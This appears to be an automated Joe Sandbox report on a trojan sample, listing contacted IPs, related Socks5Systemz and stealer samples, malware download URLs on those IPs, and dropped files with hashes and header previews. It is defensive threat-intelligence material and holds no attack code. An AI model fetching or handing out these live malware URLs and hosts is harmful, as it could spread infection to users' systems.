                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://aka.ms/pscore68powershell.exe, 00000003.00000002.1486915723.000001F9E0571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1449748816.000001F918CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        91.240.118.49
                                                                        		unknownunknown
                                                                        		49453GLOBALLAYERNLfalse
                                                                        176.113.115.96
                                                                        		unknownRussian Federation
                                                                        		49505SELECTELRUfalse
                                                                        193.176.153.180
                                                                        		unknownunknown
                                                                        		207451AGROSVITUAfalse
                                                                        104.168.28.10
                                                                        		unknownUnited States
                                                                        		36352AS-COLOCROSSINGUSfalse

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1631991
                                                                        Start date and time:2025-03-07 18:15:22 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 8m 19s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:20
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:12321321.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@18/49@0/5
                                                                        EGA Information:
                                                                        • Successful, ratio: 62.5%
                                                                        HCA Information:
                                                                        • Successful, ratio: 67%
                                                                        • Number of executed functions: 240
                                                                        • Number of non-executed functions: 265
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 23.199.214.10, 150.171.31.254
                                                                        • Excluded domains from analysis (whitelisted): ev2-ring.msedge.net, fs.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 8684 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 8884 because it is empty
                                                                        • Execution Graph export aborted for target vbc.exe, PID 8664 because there are no executed function
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        12:16:22API Interceptor58x Sleep call for process: powershell.exe modified
                                                                        12:17:04API Interceptor53x Sleep call for process: photorecoverylib.exe modified
                                                                        18:16:04Task SchedulerRun new task: {A2AACD79-CEE4-4408-8B01-4310E6C40F76} path: .

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        91.240.118.491lLsBXEoM7.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        • 91.240.118.49/forsale/silk.exe
                                                                        176.113.115.96file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            tKBxw8eOIV.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              tKBxw8eOIV.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                soft.exeGet hashmaliciousGCleaner, LummaC Stealer, Socks5SystemzBrowse
                                                                                  9uWGaRcOv8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                    9uWGaRcOv8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                      file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                        file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                          silk.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                            193.176.153.180file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                              tKBxw8eOIV.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                9uWGaRcOv8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                    silk.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                      mix.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                        mix.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                          KFkv0LwVHW.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, GCleaner, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                            random.exeGet hashmaliciousAmadey, Cryptbot, Socks5SystemzBrowse
                                                                                                              random.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                104.168.28.101lLsBXEoM7.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 104.168.28.10/003/01/inst.exe
                                                                                                                random.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                • 104.168.28.10/003/d1
                                                                                                                I5D7Y9o1R1.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                • 104.168.28.10/003/d1
                                                                                                                random.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Stealc, SystemBC, VidarBrowse
                                                                                                                • 104.168.28.10/003/WRHXWF4H
                                                                                                                random.exeGet hashmaliciousLummaC, Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                • 104.168.28.10/003/d1
                                                                                                                inst.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.168.28.10/003/d1
                                                                                                                lxnFs9LHSe.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.168.28.10/data/002

                                                                                                                Domains

                                                                                                                No context

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                AGROSVITUAfile.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 193.176.153.180
                                                                                                                tKBxw8eOIV.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 193.176.153.180
                                                                                                                9uWGaRcOv8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 193.176.153.180
                                                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 193.176.153.180
                                                                                                                silk.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 193.176.153.180
                                                                                                                mix.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 193.176.153.180
                                                                                                                mix.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 193.176.153.180
                                                                                                                KFkv0LwVHW.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, GCleaner, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                • 193.176.153.180
                                                                                                                random.exeGet hashmaliciousAmadey, Cryptbot, Socks5SystemzBrowse
                                                                                                                • 193.176.153.180
                                                                                                                random.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 193.176.153.180
                                                                                                                GLOBALLAYERNLcode.bin.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                • 91.240.118.2
                                                                                                                Ju1zQFyvCO.batGet hashmaliciousUnknownBrowse
                                                                                                                • 134.19.179.163
                                                                                                                f38186770bffa4a12a7170942b9c0d71ac736142924da24a.xlt.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                • 91.240.118.2
                                                                                                                lumma.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                • 91.240.118.2
                                                                                                                7aBtBNHDSK.exeGet hashmaliciousNanocoreBrowse
                                                                                                                • 213.152.161.114
                                                                                                                mzdQfsVuNR.exeGet hashmaliciousNanocoreBrowse
                                                                                                                • 213.152.161.114
                                                                                                                http://68.183.190.199Get hashmaliciousUnknownBrowse
                                                                                                                • 213.152.174.64
                                                                                                                1lLsBXEoM7.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 91.240.118.49
                                                                                                                AApUa7VQiy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Socks5Systemz, Stealc, VidarBrowse
                                                                                                                • 91.240.118.49
                                                                                                                random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                • 91.240.118.49
                                                                                                                SELECTELRUmQRr8Rkorf.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                                • 176.113.115.6
                                                                                                                TYqeL76sa1.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog StealerBrowse
                                                                                                                • 176.113.115.6
                                                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 176.113.115.96
                                                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 176.113.115.96
                                                                                                                nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 45.10.108.219
                                                                                                                NIwz1MK5d8.exeGet hashmaliciousAmadeyBrowse
                                                                                                                • 176.113.115.6
                                                                                                                https://cdn.discordapp.com/attachments/1208290127424528417/1347131831350464562/mzSeCT06HitK85Fb.exe?ex=67cab5c9&is=67c96449&hm=1f5dd426eb7614f3776b7dafbe51534751657ba41ccf0472c966fb8b5a3984a3&Get hashmaliciousUnknownBrowse
                                                                                                                • 5.178.87.202
                                                                                                                5c9465cda4.exeGet hashmaliciousAmadey, GCleaner, LiteHTTP Bot, LummaC Stealer, Mint Stealer, PureLog Stealer, StealcBrowse
                                                                                                                • 176.113.115.6
                                                                                                                GMOgZgNpNu.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                • 176.113.115.6
                                                                                                                xIwQcY1fc4.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog StealerBrowse
                                                                                                                • 176.113.115.6

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 91.240.118.49
                                                                                                                • 176.113.115.96
                                                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 91.240.118.49
                                                                                                                • 176.113.115.96
                                                                                                                tKBxw8eOIV.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 91.240.118.49
                                                                                                                • 176.113.115.96
                                                                                                                tKBxw8eOIV.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 91.240.118.49
                                                                                                                • 176.113.115.96
                                                                                                                xn3nGSFdRn.exeGet hashmaliciousVidarBrowse
                                                                                                                • 91.240.118.49
                                                                                                                • 176.113.115.96
                                                                                                                soft.exeGet hashmaliciousGCleaner, LummaC Stealer, Socks5SystemzBrowse
                                                                                                                • 91.240.118.49
                                                                                                                • 176.113.115.96
                                                                                                                9uWGaRcOv8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 91.240.118.49
                                                                                                                • 176.113.115.96
                                                                                                                9uWGaRcOv8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 91.240.118.49
                                                                                                                • 176.113.115.96
                                                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 91.240.118.49
                                                                                                                • 176.113.115.96
                                                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                • 91.240.118.49
                                                                                                                • 176.113.115.96

                                                                                                                Dropped Files

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                C:\ProgramData\PhotoRecoveryLib\PhotoRecoveryLib.exefile.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                    C:\ProgramData\PhotoRecoveryLib\sqlite3.dllfile.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                      file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                        tKBxw8eOIV.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                          tKBxw8eOIV.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                            soft.exeGet hashmaliciousGCleaner, LummaC Stealer, Socks5SystemzBrowse
                                                                                                                              9uWGaRcOv8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                9uWGaRcOv8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                    file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                      silk.exeGet hashmaliciousSocks5SystemzBrowse

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\ProgramData\GV73it54.dat

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe
                                                                                                                                        File Type:ISO-8859 text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):8
                                                                                                                                        Entropy (8bit):1.75
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:d/ll:lll
                                                                                                                                        MD5:97E29BE18290F1BE0F1608225D7A24F0
                                                                                                                                        SHA1:5FE7DBD99C3425425635CCE6C3CC3E2B88ACBB0E
                                                                                                                                        SHA-256:AF601D77E17BE594DD8B790B237FDFF6955DDCAE7B2BE0107FDB37C875B9842F
                                                                                                                                        SHA-512:EFADFB3AB6C72B18FC642D6E2A564E420E2795F097ECC9A186CC27B57B4AA619BBDCA8C949633B39B584A15FF71D33AA73547558D4FAC13FF90480A6CCDFC387
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:**.g....

                                                                                                                                        C:\ProgramData\GV73rc54.dat

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4
                                                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:jln:Z
                                                                                                                                        MD5:A5403C7D81B2C8A123C847982165418B
                                                                                                                                        SHA1:F143C36FC53BFDE11A8D122249ACED46C43CC2E2
                                                                                                                                        SHA-256:01B4F6BD5D6A06A7B74A8565CEB4F845AFE0AE96A0AC05CF5E86066BF7B538EC
                                                                                                                                        SHA-512:0D8717E558E06E1C6AC1F9F1C4B7562523A455E4C3B85CE06940C198265B5F25C55F6066B668706D246ACD5C9A357948B0334C59A21B3FB44C829053A92EA426
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:....

                                                                                                                                        C:\ProgramData\GV73resa.dat

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):128
                                                                                                                                        Entropy (8bit):2.954183719820564
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Z8VUrGqdhHzXDBdUBWetxt:CVU6q3HzX3UFx
                                                                                                                                        MD5:073FE28824EFEF0F988C91430211DB78
                                                                                                                                        SHA1:4B8FDD8229EA0EF42FE7770D5C027419F552120A
                                                                                                                                        SHA-256:37007FCAA22D8287277F6D9C6720F0E946E1F7C419145F1B7D719C0F751EF0E0
                                                                                                                                        SHA-512:0D128B31D1F2EDE809AD33F11C80A266B6B8E097B80BE135A5EDE7E6D7883A7E51D437E147D803F4887B07947B9FD461D05DF750C9382996FAE7F0BC2168E49E
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:1eb2b84e0110dff756582a45e74bb62f518d3799011c89eb7c719048e83fac56................................................................

                                                                                                                                        C:\ProgramData\PhotoRecoveryLib\PhotoRecoveryLib.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5345280
                                                                                                                                        Entropy (8bit):6.63948529168088
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:98304:lR+3fIUMIN/0pG6dDIBCZP/qr3zRgTiSZlWWqp9ebFP+m:b9Rc6dkgZPY2zZH896FP+m
                                                                                                                                        MD5:84FDC770D4A9ECD786E59A0C9F7F9C26
                                                                                                                                        SHA1:8B8FFADE1B9E72AFC8FB6F8B456EEEC92B051F5C
                                                                                                                                        SHA-256:64458D205E25C3D036172AE30C7C2D214ECF0EAE5BFE18BD99E7011E94748B8E
                                                                                                                                        SHA-512:1779C4FCB4B96A9FE9277E86F51181055D0903296BEBA5DD99523F9F06F3191807983648139198A82D894370F85684346E6E53AC68AB7DE5C5CAE78EB861C0E0
                                                                                                                                        Malicious:true
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L......g..................#..:.......?#.......#...@...........................Q.....$eR.....................................t.#.T....`$.h.-...........................................................................#..............................text.....#.......#.................`....rdata...D....#..F....#.............@..@.data...xc....#..0....#.............@....rsrc.....-..`$...-...$.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\ProgramData\PhotoRecoveryLib\sqlite3.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):645592
                                                                                                                                        Entropy (8bit):6.50414583238337
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: tKBxw8eOIV.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: tKBxw8eOIV.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: soft.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: 9uWGaRcOv8.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: 9uWGaRcOv8.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: silk.exe, Detection: malicious, Browse
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe
                                                                                                                                        File Type:CSV text
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):859
                                                                                                                                        Entropy (8bit):5.379735105545312
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6Kha1qE4GIs0E4KD:MxHKQwYHKGSI6oa1qHGIs0HKD
                                                                                                                                        MD5:A058EE73BB63D01FE70EC35E64526E1F
                                                                                                                                        SHA1:2CF59A0BD9EFE6AFBFA9A52C6F2674B29ED4D74A
                                                                                                                                        SHA-256:8494FE24C1CBD62B54475B99A33911969401FA2A4920CE4A3F212BD0495E5B7D
                                                                                                                                        SHA-512:DC334C78C448E06D38D1A2B03596E23DD0519FCDDB1E63353D5EC4E1733BC13856D6B6D65DC2C68D1F765D2E0D8F411EC81742AE43777DB30336F8ECA31AD7D9
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..

                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\001[1].exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\12321321.exe
                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):3161088
                                                                                                                                        Entropy (8bit):7.997471703086555
                                                                                                                                        Encrypted:true
                                                                                                                                        SSDEEP:98304:NxEvG49LjUIydTFy3n3yeGolV+z/6xqQ1:NevlV603+Gr1
                                                                                                                                        MD5:A875EFEC27F37FB4E42141BBA8771C65
                                                                                                                                        SHA1:55155168188F8FBB617A0DF6FB2E19FBCB459040
                                                                                                                                        SHA-256:A20AF6C09E452F7E5D91B5B11D95AE5EB9C6C3A41595104029E6458C4ED6BAC9
                                                                                                                                        SHA-512:70A3903F23798FDED149FFFE75F71AE3B27E4314F12E7C5A921A57019A1C6EEFE0E394F3C7EF0801CB8736BE8C14B3CE1EDC88A30AA4C1A2894EBDF2A27B9495
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Zg.........."......./.............. ....@...... ........................0...........@.........................................................../.............................................................................................. ..H............text...../.. ..../................. ..`.rsrc........./......./.............@..@........................................H........H.. F......=...0...aE/..G.......................................0..P........+@~$...+<+A.,.~%...~.... ....(....(....*~%...~.... ....(....(....*.+.(....+..+...(O...*b.....+.+.*(-...+.(....+.....0................8..........8..........8....~&.....(....,.~%...~.... ....(....(....+.~%...~.... ....(....(....~&.....(....,.~%...~.... ]...(....(....*~%...~.... ....(....(....*(P...8\...(P...8]...(P...8^......(O...*b.....+.+.*(-...+.(....+.....0..........8....8....~%...~)...~.... ....8.

                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\silk[1].exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\12321321.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4588286
                                                                                                                                        Entropy (8bit):7.998686424491839
                                                                                                                                        Encrypted:true
                                                                                                                                        SSDEEP:98304:3UzFjCwQYfBmiaINgQyLJPL844UjUj/GkhFCgy77:kRjFlYiknLJD8NFjzhBy77
                                                                                                                                        MD5:E4265C65F6F798BDC3F1644CAAA09379
                                                                                                                                        SHA1:5C72CD53FB3091B5CDB44021A05ABD4CB116EF32
                                                                                                                                        SHA-256:A5847CF2D171622E07EC1CB81015033C57F60E7BF3E3F808A5DBDCB44FFE4498
                                                                                                                                        SHA-512:841B703FEEF6034AD8BE9707883B580A08764CAA74D94C6FC4D31AC3A0FB88477C792F742373CE597ECEF7CAA0457322E0041DE3DE32C2D24C6DFF0029B7F99D
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@............@......@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):64
                                                                                                                                        Entropy (8bit):1.1510207563435464
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                                                                                        MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                                                                                        SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                                                                                        SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                                                                                        SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:@...e.................................^..............@..........

                                                                                                                                        C:\Users\user\AppData\Local\Photo Recovery Library 5.7\Qt5Concurrent.dll (copy)

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp
                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):18432
                                                                                                                                        Entropy (8bit):5.996483336647155
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:lLKSmUAPRD6PA/GKge44+4yif7DOnFPV5kzaOCSSZ:IVH/D4z4yG7DOnFdKaO6Z
                                                                                                                                        MD5:C5735F75847667E33A6B2D5E50D19C6F
                                                                                                                                        SHA1:D2C5952138FA5A246EC5900C9E680E7AEAF099AF
                                                                                                                                        SHA-256:32B0ACDF551507B4A8B9BD0467BEFDC2539C776E3F48221F0B577499F6EAE616
                                                                                                                                        SHA-512:DA961258A682C732F0A480EE7220D74B4511FA5313FB3BF0ACAF07AA42FA7410F3EE1A83C221C995854C2919286676F346A45CD278E1D1929E0164155F6D98F5
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................^....v.U......S......g......Q..............f......V......W......P....Rich...........................PE..L......Q...........!..... ...$.......(.......0.....f.................................$....@..........................?......L6..P....`..,....................p......................................x1..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........P.......<..............@....rsrc...,....`.......>..............@..@.reloc.......p.......D..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Photo Recovery Library 5.7\Qt5PrintSupport.dll (copy)

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp
                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):226304
                                                                                                                                        Entropy (8bit):6.833378525054972
                                                                                                                                        Encrypted:false
